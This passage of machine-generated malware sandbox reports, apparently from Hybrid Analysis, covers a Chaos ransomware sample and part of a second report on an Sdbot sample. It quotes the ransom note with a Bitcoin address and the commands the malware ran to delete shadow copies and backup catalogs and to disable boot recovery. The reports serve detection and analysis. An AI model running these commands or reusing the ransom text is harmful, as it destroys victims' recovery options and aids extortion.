KERNELBASE.DLL)", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "binary-58", "type": 8, "relevance": 3, "name": "Drops a file that contains system information", "description": "\"svchost.url\" contains indicator \"HAPUBWS\" (Line: 2; Offset: 21)\n \"svchost.url\" contains indicator \"HAPUBWS\" (Line: 4; Offset: 18)", "origin": "Binary File", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" wrote 26624 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\svchost.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"svchost.exe\" has type \"PE32 executable (GUI) Intel 80386 Mono/.Net assembly for MS Windows\"- Location: [%APPDATA%\\svchost.exe]- [targetUID: 00000000-00005968]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "api-1", "type": 6, "relevance": 10, "name": "Creates guarded memory regions (anti-debugging trick to avoid memory dumping)", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" is allocating memory with PAGE_GUARD access rights (Handle: 4294967295); (PID: 5776)\n \"svchost.exe\" is allocating memory with PAGE_GUARD access rights (Handle: 4294967295); (PID: 5968)", "origin": "API Call", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "api-24", "type": 6, "relevance": 10, "name": "Tries to sleep for a long time (more than two minutes)", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" sleeping for \"1566804069\" milliseconds", "origin": "API Call", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Ransomware/Banking", "identifier": "string-13", "type": 2, "relevance": 5, "name": "Detected indicator that file is ransomware", "description": "\"Your computer was infected with a ransomware virus. Your files have been encrypted and you won't\" (Source: f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2, Indicator: \"files have been encrypted\")\n \"----> Chaos is multi language ransomware. Translate your note to any language <----All of your files have been encryptedYour computer was infected with a ransomware virus. Your files have been encrypted and you won't be able to decrypt them without our help.What can I do to get my files back?You can buy our special decryption software, this software will allow you to recover all of your data and remove theransomware from your computer.The price for the software is $1,500. Payment can be made in Bitcoin only.How do I pay, where do I get Bitcoin?Purchasing Bitcoin varies from country to country, you are best advised to do a quick google searchyourself to find out how to buy Bitcoin. Many of our customers have reported these sites to be fast and reliable:Coinmama - hxxps://www.coinmama.com Bitpanda - hxxps://www.bitpanda.comPayment informationAmount: 0.1473766 BTCBitcoin Address: bc1qlnzcep4l4ac0ttdrq7awxev9ehu465f2vpt9x0\" (Source: read_it.txt, Indicator: \"files have been encrypted\")\n \"All of your files have been encrypted\" (Source: 6000023-cctor, Indicator: \"files have been encrypted\")\n \"ur computer was infected with a ransomware virus. Your files have been encrypted and you won't\" (Source: 00000000-00005776.00000000.66385.00CE2000.00000020.mdmp, Indicator: \"files have been encrypted\")\n \"ll of your files have been encrypted\" (Source: 00000000-00005776.00000000.66385.00CE2000.00000020.mdmp, Indicator: \"files have been encrypted\")\n \"our computer was infected with a ransomware virus. Your files have been encrypted and you won't\" (Source: 00000000-00005776.00000000.66385.00CE2000.00000020.mdmp, Indicator: \"files have been encrypted\")\n \"ll of your files have been encrypted\" (Source: 00000000-00005968.00000002.70817.008E2000.00000020.mdmp, Indicator: \"files have been encrypted\")\n \"our computer was infected with a ransomware virus. Your files have been encrypted and you won't\" (Source: 00000000-00005968.00000002.70817.008E2000.00000020.mdmp, Indicator: \"files have been encrypted\")", "origin": "File/Memory", "attck_id": "T1491.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1491/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Ransomware/Banking", "identifier": "binary-10", "type": 8, "relevance": 5, "name": "The input sample dropped very many files", "description": "The input sample dropped 1979 files (often an indicator for ransomware)", "origin": "Binary File", "attck_id": "T1491.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1491/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "target-413", "type": 9, "relevance": 3, "name": "Spawned processes likely due to injection", "description": "Process \"%APPDATA%\\svchost.exe\" spawned likely due to injection", "origin": "Monitored Target", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"svchost.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"svchost.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\read_it.txt\" with delete access\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\READ_IT.TXT\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" (UID: 00000000-00005776)\n Spawned process \"svchost.exe\" (UID: 00000000-00005968)\n Spawned process \"cmd.exe\" with commandline \"/C vssadmin delete shadows /all /quiet & wmic shadowcopy delete\" (UID: 00000000-00000244)\n Spawned process \"vssadmin.exe\" with commandline \"vssadmin delete shadows /all /quiet\" (UID: 00000000-00004144)\n Spawned process \"WMIC.exe\" with commandline \"wmic shadowcopy delete\" (UID: 00000000-00003480)\n Spawned process \"cmd.exe\" with commandline \"/C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no\" (UID: 00000000-00003944)\n Spawned process \"bcdedit.exe\" with commandline \"bcdedit /set {default} bootstatuspolicy ignoreallfailures\" (UID: 00000000-00001216)\n Spawned process \"bcdedit.exe\" with commandline \"bcdedit /set {default} recoveryenabled no\" (UID: 00000000-00004368)\n Spawned process \"cmd.exe\" with commandline \"/C wbadmin delete catalog -quiet\" (UID: 00000000-00003184)\n Spawned process \"wbadmin.exe\" with commandline \"wbadmin delete catalog -quiet\" (UID: 00000000-00003720)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\svchost.exe\" (Handle: 964)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\svchost.exe\" (Handle: 964)\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\svchost.exe\" (Handle: 964)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" allocated memory in \"C:\\f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-33", "type": 9, "relevance": 10, "name": "Creates a fake system process", "description": "Process \"svchost.exe\" at non-system pathway \"%APPDATA%\\svchost.exe\" (UID: 00000000-00005968)", "origin": "Monitored Target", "attck_id": "T1036.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/005"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-6", "type": 9, "relevance": 8, "name": "Tries to suppress failures during boot (often used to hide system changes)", "description": "Tries to suppress failures during boot \"bcdedit.exe\" with commandline \"bcdedit /set {default} bootstatuspolicy ignoreallfailures\" (UID: 00000000-00001216)", "origin": "Monitored Target", "attck_id": "T1490", "attck_id_wiki": "https://attack.mitre.org/techniques/T1490"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Ransomware/Banking", "identifier": "registry-3", "type": 3, "relevance": 9, "name": "Disables Windows Task Manager (taskmgr)", "description": "\"svchost.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLETASKMGR\"; Value: \"31000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Ransomware/Banking", "identifier": "binary-9", "type": 8, "relevance": 5, "name": "The analysis extracted a known ransomware file", "description": "Found dropped filename \"read_it.txt\" which has been seen in the context of ransomware (Indicator: READ_IT.txt)", "origin": "Binary File", "attck_id": "T1491.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1491/001"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Destruction", "identifier": "target-4", "type": 9, "relevance": 10, "name": "Deletes volume snapshots (often used by ransomware)", "description": "Process \"vssadmin.exe\" with commandline \"vssadmin delete shadows /all /quiet\" (UID: 00000000-00004144)\n Process \"WMIC.exe\" with commandline \"wmic shadowcopy delete\" (UID: 00000000-00003480)", "origin": "Monitored Target", "attck_id": "T1490", "attck_id_wiki": "https://attack.mitre.org/techniques/T1490"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Destruction", "identifier": "target-80", "type": 9, "relevance": 10, "name": "Deletes backup catalog", "description": "Deletes backup catalog files using \"wbadmin.exe\" with commandline \"wbadmin delete catalog -quiet\" (UID: 00000000-00003720)", "origin": "Monitored Target", "attck_id": "T1490", "attck_id_wiki": "https://attack.mitre.org/techniques/T1490"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33
https://hybrid-analysis.com/sample/e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33
Hybrid Analysis - Killers
{"size": 790612, "type": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "submit_name": "e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33", "sha256": "e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33", "av_detect": 89, "vx_family": "Sdbot.Generic", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 5, "total_signatures": 202, "extracted_files": [{"name": "r2585.bat", "file_path": "%TEMP%\\r2585.bat", "file_size": 238, "sha256": "41a6e156434c17ff12b521065b6576ab61db9e900e527052432db8bbb70d08f9", "type_tags": ["text"], "description": "DOS batch file, ASCII text, with CRLF line terminators", "runtime_process": "e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe (PID: 5056)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "r2908.bat", "file_path": "%TEMP%\\r2908.bat", "file_size": 124, "sha256": "54fa0bc36620b36578ac60ee57024c9781c95c66a7c39569cf2a80972689b690", "type_tags": ["text"], "description": "DOS batch file, ASCII text, with CRLF line terminators", "runtime_process": "dllconf.exe (PID: 5068)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dllconf.exe", "file_path": "%WINDIR%\\System32\\dllconf.exe", "file_size": 817298, "sha256": "26ad29b9e4a4a290f6ad4732522f9d1e1a9e4dc906607719c4d58adda9ed2cf4", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe (PID: 5056)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dllconf.exe", "file_path": "C:\\dllconf.exe", "file_size": 802929, "sha256": "6e0a3de0c462820764184c94c0dfff4f37889cef262189fb543f74df7f2fbf74", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe (PID: 5056)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "DLLCONF.EXE.67A9C384.bin", "file_size": 817298, "sha256": "26ad29b9e4a4a290f6ad4732522f9d1e1a9e4dc906607719c4d58adda9ed2cf4", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00005056", "name": "e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe", "normalized_path": "C:\\e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe", "sha256": "e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33"}, {"uid": "00000000-00005068", "parentuid": "00000000-00005056", "name": "dllconf.exe", "normalized_path": "C:\\dllconf.exe", "command_line": "\\dllconf.exe", "sha256": "6e0a3de0c462820764184c94c0dfff4f37889cef262189fb543f74df7f2fbf74"}, {"uid": "00000000-00005392", "parentuid": "00000000-00005068", "name": "dllconf.exe", "normalized_path": "%WINDIR%\\system32\\dllconf.exe", "sha256": "26ad29b9e4a4a290f6ad4732522f9d1e1a9e4dc906607719c4d58adda9ed2cf4"}, {"uid": "00000000-00005644", "parentuid": "00000000-00005068", "name": "cmd.exe", "normalized_path": "%WINDIR%\\system32\\cmd.exe", "command_line": "/c \"\"%TEMP%\\r2908.bat\" \"", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00005268", "parentuid": "00000000-00005056", "name": "cmd.exe", "normalized_path": "%WINDIR%\\system32\\cmd.exe", "command_line": "/c \"\"%TEMP%\\r2585.bat\" \"", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 2}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 3, "informative_identifiers_count": 12}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 2, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Services File Permissions Weakness", "attck_id": "T1574.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/010", "malicious_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Services File Permissions Weakness", "attck_id": "T1574.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/010", "malicious_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Clear Windows Event Logs", "attck_id": "T1070.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 4, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 2, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": 